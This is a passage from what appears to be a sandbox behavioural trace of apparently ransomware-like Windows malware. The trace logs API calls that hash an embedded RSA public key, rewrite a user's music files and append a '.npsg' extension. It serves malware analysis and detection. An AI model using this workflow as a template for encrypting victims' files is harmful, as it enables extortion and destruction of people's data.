KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.940] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.941] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.941] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.941] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.941] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.941] GetLastError () returned 0x0 [0238.941] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.941] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.941] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.941] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.941] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.942] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.942] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12132, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.942] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.943] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.943] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.943] CloseHandle (hObject=0x644) returned 1 [0238.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0238.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b88cd0 [0238.947] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\CRvW0j4zidXfJqnq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\crvw0j4zidxfjqnq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\CRvW0j4zidXfJqnq.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\crvw0j4zidxfjqnq.mp3.npsg")) returned 1 [0238.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.948] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.949] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5c0200, ftCreationTime.dwHighDateTime=0x1d5c0a9, ftLastAccessTime.dwLowDateTime=0xff729460, ftLastAccessTime.dwHighDateTime=0x1d5bc37, ftLastWriteTime.dwLowDateTime=0xff729460, ftLastWriteTime.dwHighDateTime=0x1d5bc37, nFileSizeHigh=0x0, nFileSizeLow=0x2910, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dvx4JbN1scNn5l.wav", cAlternateFileName="DVX4JB~1.WAV")) returned 1 [0238.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.949] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Dvx4JbN1scNn5l.wav") returned=".wav" [0238.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Dvx4JbN1scNn5l.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\dvx4jbn1scnn5l.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.950] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=10512) returned 1 [0238.950] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.952] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x28ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.952] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.954] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.954] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2910, lpOverlapped=0x0) returned 1 [0238.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.954] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.955] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.955] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.955] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.955] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.955] GetLastError () returned 0x0 [0238.956] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.956] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.956] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.956] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.956] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2910) returned 0x3b88cd0 [0238.956] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b862d0 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86318 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bf0 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c20 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.956] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c38 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c20 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.958] GetCurrentThreadId () returned 0x5b4 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87798 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.958] GetCurrentThreadId () returned 0x5b4 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0238.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c20 [0238.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c38 [0238.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c98 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c50 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cb0 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c50 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c20 [0238.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0238.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) 